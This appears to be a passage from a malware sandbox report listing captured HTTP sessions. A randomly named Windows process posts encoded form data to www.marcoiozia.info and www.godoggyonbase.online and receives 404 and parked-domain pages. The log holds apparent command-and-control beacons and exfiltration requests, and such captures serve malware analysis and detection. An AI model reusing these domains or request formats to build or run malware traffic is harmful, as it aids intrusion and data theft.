                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    2 | 192.168.2.5 | 55086 | 195.110.124.133 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:15:57.171835899 CEST | 785 | OUT | POST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 229
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 61 52 6d 72 68 70 44 51 66 4c 51 4d 42 44 77 30 49 62 78 68 4c 2b 47 64 44 78 31 66 4b 74 31 50 4a 67 79 49 4d 6d 67 79 31 49 59 71 6b 4e 4e 42 6c 74 62 72 55 54 67 67 62 6c 48 64 56 39 79 58 74 48 77 5a 78 30 70 67 63 54 70 47 6f 59 2b 64 51 2f 77 51 54 2b 35 70 73 4e 78 74 73 6b 70 6a 43 4b 79 63 43 4f 4d 68 79 66 30 41 39 4f 42 4e 50 38 57 57 4a 38 4a 66 30 4b 62 6b 77 38 4b 75 61 37 61 6e 33 69 78 30 7a 75 35 62 77 56 6c 58 5a 6e 76 37 31 45 74 67 46 34 57 6c 65 63 62 4b 64 47 36 70 37 66 2f 59 6b 46 52 47 71 46 45 35 35 4a 51 59 74 74 42 70 79 6f 4a 57 6b 79 71 66 6f 63 75 39 38 53 73 33 30 45 55 2b 68 79 59 6e
                    Data Ascii: QpGDsvFp=XJXYQUW+jG++aRmrhpDQfLQMBDw0IbxhL+GdDx1fKt1PJgyIMmgy1IYqkNNBltbrUTggblHdV9yXtHwZx0pgcTpGoY+dQ/wQT+5psNxtskpjCKycCOMhyf0A9OBNP8WWJ8Jf0Kbkw8Kua7an3ix0zu5bwVlXZnv71EtgF4WlecbKdG6p7f/YkFRGqFE55JQYttBpyoJWkyqfocu98Ss30EU+hyYn
                    Aug 29, 2024 12:15:57.838479042 CEST | 367 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:15:57 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    3 | 192.168.2.5 | 55087 | 195.110.124.133 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:15:59.711415052 CEST | 1802 | OUT | POST /6u21/ HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.marcoiozia.info
                    Cache-Control: max-age=0
                    Content-Length: 1245
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.marcoiozia.info/6u21/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 58 4a 58 59 51 55 57 2b 6a 47 2b 2b 61 52 6d 72 68 70 44 51 66 4c 51 4d 42 44 77 30 49 62 78 68 4c 2b 47 64 44 78 31 66 4b 74 39 50 4a 54 36 49 4e 42 38 79 30 49 59 71 36 39 4e 41 6c 74 61 33 55 58 45 6b 62 6c 4c 6e 56 2f 36 58 75 6b 34 5a 7a 41 31 67 56 54 70 47 33 49 2b 51 4e 76 77 4a 54 2b 70 74 73 4e 68 74 73 6b 70 6a 43 4c 43 63 43 62 34 68 30 66 30 48 71 2b 42 52 64 4d 57 75 4a 38 52 6c 30 4b 65 66 7a 50 43 75 62 62 71 6e 31 77 5a 30 77 4f 35 5a 78 56 6c 31 5a 6e 71 6c 31 45 77 54 46 35 69 66 65 65 4c 4b 65 41 50 67 6e 75 6a 76 79 48 4e 6e 2b 45 49 44 34 73 41 35 75 63 70 64 79 2f 35 57 34 47 36 71 2b 4b 75 34 35 79 55 79 67 79 41 45 6e 31 42 76 4c 6f 70 73 79 62 56 63 68 54 4d 6d 61 6e 41 76 58 66 6b 48 4f 7a 35 2f 75 61 69 30 35 69 41 70 67 65 6a 47 56 67 31 74 48 46 36 67 32 75 68 64 73 4d 51 56 71 67 41 41 2b 49 57 49 4a 36 70 2b 52 42 74 66 4e 50 41 4c 51 32 4b 56 69 6f 45 6b 62 42 42 46 4a 79 75 70 53 7a 62 63 2f 4b 71 48 79 6f 6e 48 64 57 48 34 70 44 43 71 2f [TRUNCATED]
                    Data Ascii: QpGDsvFp=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 [TRUNCATED]
                    Aug 29, 2024 12:16:00.487427950 CEST | 367 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:16:00 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    4 | 192.168.2.5 | 55088 | 195.110.124.133 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:16:02.255439997 CEST | 501 | OUT | GET /6u21/?QpGDsvFp=aL/4TjGztHWcUB/Ah5XMbJsPVjcLX5spIqygDBReB+gjFi+JNHxT0K0F5MtDhvjmRAZ0VF/vQduwy3cjjhNQXD5C3/i7fPsqWYlJ4opKyF5MG7GdSMwyyOQYqJ9RHJTdWA==&en=KRMtj8Zx1f- HTTP/1.1
                    Host: www.marcoiozia.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Aug 29, 2024 12:16:02.915963888 CEST | 367 | IN | HTTP/1.1 404 Not Found
                    Date: Thu, 29 Aug 2024 10:16:02 GMT
                    Server: Apache
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 75 32 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6u21/ was not found on this server.</p></body></html>


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    5 | 192.168.2.5 | 55089 | 84.32.84.32 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:16:08.003076077 CEST | 780 | OUT | POST /2b9b/ HTTP/1.1
                    Host: www.godoggyonbase.online
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.godoggyonbase.online
                    Cache-Control: max-age=0
                    Content-Length: 209
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.godoggyonbase.online/2b9b/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 55 46 6f 35 58 62 6e 71 6a 71 55 2b 44 44 6d 36 35 54 6c 32 61 2f 61 47 58 4b 54 44 36 61 5a 79 34 63 66 36 6d 71 31 66 6c 61 72 43 2f 78 34 43 2b 6f 32 31 54 5a 57 33 4e 65 5a 34 48 68 77 67 65 49 71 75 76 78 53 30 65 6a 37 79 49 51 39 77 32 58 32 41 36 57 4e 47 6b 6a 6a 61 74 77 5a 74 38 6d 77 70 6f 2f 4a 4f 69 48 4e 41 65 6a 53 46 2f 7a 30 30 42 35 52 45 30 51 77 58 4d 41 41 78 73 5a 37 4d 74 4c 4f 6d 37 75 4c 46 68 64 61 4a 68 4b 71 33 50 72 4a 47 6c 38 33 30 4f 6a 4b 59 56 71 79 6d 61 74 31 51 66 4a 72 76 49 67 65 4f 37 63 52 63 7a 30 6b 76 74 5a 79 6b 6a 69 30 7a 6e 73 4c 35 77 54 59 3d
                    Data Ascii: QpGDsvFp=UFo5XbnqjqU+DDm65Tl2a/aGXKTD6aZy4cf6mq1flarC/x4C+o21TZW3NeZ4HhwgeIquvxS0ej7yIQ9w2X2A6WNGkjjatwZt8mwpo/JOiHNAejSF/z00B5RE0QwXMAAxsZ7MtLOm7uLFhdaJhKq3PrJGl830OjKYVqymat1QfJrvIgeO7cRcz0kvtZykji0znsL5wTY=


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    6 | 192.168.2.5 | 55090 | 84.32.84.32 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:16:10.557533026 CEST | 800 | OUT | POST /2b9b/ HTTP/1.1
                    Host: www.godoggyonbase.online
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.godoggyonbase.online
                    Cache-Control: max-age=0
                    Content-Length: 229
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.godoggyonbase.online/2b9b/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 55 46 6f 35 58 62 6e 71 6a 71 55 2b 44 67 2b 36 2b 79 6c 32 62 66 61 46 59 71 54 44 6a 4b 5a 32 34 63 44 36 6d 6f 5a 32 6c 73 44 43 78 77 49 43 73 36 65 31 51 5a 57 33 56 4f 5a 39 44 68 77 56 65 49 6e 52 76 78 2b 30 65 69 66 79 49 55 31 77 32 6c 65 44 31 6d 4e 41 39 54 6a 69 31 51 5a 74 38 6d 77 70 6f 2f 63 70 69 48 46 41 65 7a 69 46 38 53 30 33 64 4a 52 46 7a 51 77 58 49 41 41 39 73 5a 37 69 74 50 4f 4d 37 73 7a 46 68 63 71 4a 68 62 71 30 41 72 49 4e 68 38 32 39 47 47 69 49 53 6f 6d 55 48 4f 4d 31 4a 62 72 36 4a 57 7a 6b 68 2b 5a 30 67 55 49 58 39 4b 36 54 79 53 56 61 39 50 62 4a 75 45 50 6e 4b 52 50 6f 67 4e 55 43 33 44 55 62 73 35 4b 4c 4d 55 61 4d
                    Data Ascii: QpGDsvFp=UFo5XbnqjqU+Dg+6+yl2bfaFYqTDjKZ24cD6moZ2lsDCxwICs6e1QZW3VOZ9DhwVeInRvx+0eifyIU1w2leD1mNA9Tji1QZt8mwpo/cpiHFAeziF8S03dJRFzQwXIAA9sZ7itPOM7szFhcqJhbq0ArINh829GGiISomUHOM1Jbr6JWzkh+Z0gUIX9K6TySVa9PbJuEPnKRPogNUC3DUbs5KLMUaM


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    7 | 192.168.2.5 | 55091 | 84.32.84.32 | 80 | 6584 | C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp | Bytes transferred | Direction | Data
                    Aug 29, 2024 12:16:13.098757982 CEST | 1817 | OUT | POST /2b9b/ HTTP/1.1
                    Host: www.godoggyonbase.online
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.godoggyonbase.online
                    Cache-Control: max-age=0
                    Content-Length: 1245
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Referer: http://www.godoggyonbase.online/2b9b/
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Data Raw: 51 70 47 44 73 76 46 70 3d 55 46 6f 35 58 62 6e 71 6a 71 55 2b 44 67 2b 36 2b 79 6c 32 62 66 61 46 59 71 54 44 6a 4b 5a 32 34 63 44 36 6d 6f 5a 32 6c 73 4c 43 78 47 63 43 2b 4c 65 31 66 35 57 33 4c 65 5a 38 44 68 77 79 65 49 2f 64 76 78 43 6b 65 68 33 79 4c 32 74 77 77 52 4b 44 75 57 4e 41 67 6a 6a 5a 74 77 5a 43 38 69 73 74 6f 2f 4d 70 69 48 46 41 65 78 4b 46 6f 54 30 33 66 4a 52 45 30 51 77 4c 4d 41 41 52 73 5a 6a 55 74 50 43 32 36 63 54 46 6b 4d 36 4a 6d 70 43 30 4a 72 49 50 6d 38 32 6c 47 47 6e 50 53 6f 72 76 48 50 70 51 4a 5a 72 36 49 51 4f 64 33 36 6f 6f 7a 32 30 6b 36 74 6d 32 6f 44 68 4e 79 65 7a 48 72 58 66 47 42 53 48 52 6d 61 70 47 78 78 49 4f 35 65 44 62 50 52 66 78 2b 42 53 50 41 59 33 4b 78 4a 5a 59 43 4c 4b 66 76 69 2b 4b 42 4e 37 37 51 43 44 52 47 74 2b 54 63 74 54 70 43 32 34 2f 7a 31 51 74 4b 78 31 35 4a 42 6e 55 77 4f 33 78 78 33 7a 32 66 38 38 32 4a 58 30 63 4a 6c 52 42 63 75 65 31 52 4e 31 6c 78 54 42 32 75 70 66 5a 73 36 6e 43 46 44 67 62 57 51 76 49 35 72 6c 56 36 67 32 6e 55 [TRUNCATED]
                    Data Ascii: QpGDsvFp= [TRUNCATED]


                    Session ID:8
                    Source IP:192.168.2.5
                    Source Port:55092
                    Destination IP:84.32.84.32
                    Destination Port:80
                    PID:6584
                    Process:C:\Program Files (x86)\QmlsmuZvDORPyTAmQqkHcJtwkvpxYZNzteNdyKVkHNHQIZwXNeNsuJEZzuyykRbUya\OAIexgManRWDie.exe
                    Timestamp:Aug 29, 2024 12:16:15.642644882 CEST
                    Bytes transferred:506
                    Direction:OUT
                    Data:GET /2b9b/?QpGDsvFp=ZHAZUszVkZojOh6l4QgRWsOseo6gnr5+/9v7uoYYl6Pb3zYSipzXXNStKfhRGhUQf6Tergy2VCT+UWp4uEi/6TdO8TzwggtBmSoW3KZOjFFDDhjE/y85QqgGs38SMRVr8g==&en=KRMtj8Zx1f- HTTP/1.1
                    Host: www.godoggyonbase.online
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                    Accept-Language: en-US
                    Connection: close
                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)
                    Timestamp:Aug 29, 2024 12:16:16.092195988 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data:HTTP/1.1 200 OK
                    Server: hcdn
                    Date: Thu, 29 Aug 2024 10:16:16 GMT
                    Content-Type: text/html
                    Content-Length: 10072
                    Connection: close
                    Vary: Accept-Encoding
                    alt-svc: h3=":443"; ma=86400
                    x-hcdn-request-id: 26dc6ec93a10975a6b32ffa807a70078-bos-edge1
                    Expires: Thu, 29 Aug 2024 10:16:15 GMT
                    Cache-Control: no-cache
                    Accept-Ranges: bytes
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                    Timestamp:Aug 29, 2024 12:16:16.092581987 CEST
                    Bytes transferred:224
                    Direction:IN
                    Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                    Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                    Timestamp:Aug 29, 2024 12:16:16.092803001 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                    Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                    Timestamp:Aug 29, 2024 12:16:16.093839884 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                    Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                    Timestamp:Aug 29, 2024 12:16:16.093852997 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                    Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                    Timestamp:Aug 29, 2024 12:16:16.095926046 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                    Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                    Timestamp:Aug 29, 2024 12:16:16.095940113 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 6c 79 20 66 61 73 74 2c 20 73 65 63 75 72 65 20 61 6e 64 20 75 73 65 72 2d 66 72 69 65 6e 64 6c 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65
                    Data Ascii: ly fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=co
                    Timestamp:Aug 29, 2024 12:16:16.098018885 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 73 65 71 75 65 6e 63 65 22 29 3b 72 3d 28 28 31 30 32 33 26 72 29 3c 3c 31 30 29 2b 28 31 30 32 33 26 65 29 2b 36 35 35 33 36 7d 6e 2e 70 75 73 68 28 72 29 7d 72 65 74 75 72 6e 20 6e 7d 2c 65 6e 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b
                    Data Ascii: sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fr
                    Timestamp:Aug 29, 2024 12:16:16.098032951 CEST
                    Bytes transferred:1236
                    Direction:IN
                    Data Raw: 6c 65 6e 67 74 68 2b 31 2c 30 3d 3d 3d 6c 29 2c 4d 61 74 68 2e 66 6c 6f 6f 72 28 66 2f 68 29 3e 72 2d 61 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 28 33 29 22 29 3b 61 2b 3d 4d 61
                    Data Ascii: length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.charCodeAt(d-1)-65<26),m.splice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase
                    Timestamp:Aug 29, 2024 12:16:16.098043919 CEST
                    Bytes transferred:300
                    Direction:IN
                    Data Raw: 2e 22 29 7d 2c 74 68 69 73 2e 54 6f 55 6e 69 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 3d 6f 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61
                    Data Ascii: .")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?punycode.decode(t.slice(4)):t)}return e.join(".")}},pathName=window.location.hostname,account=document.getElementById("pathName"


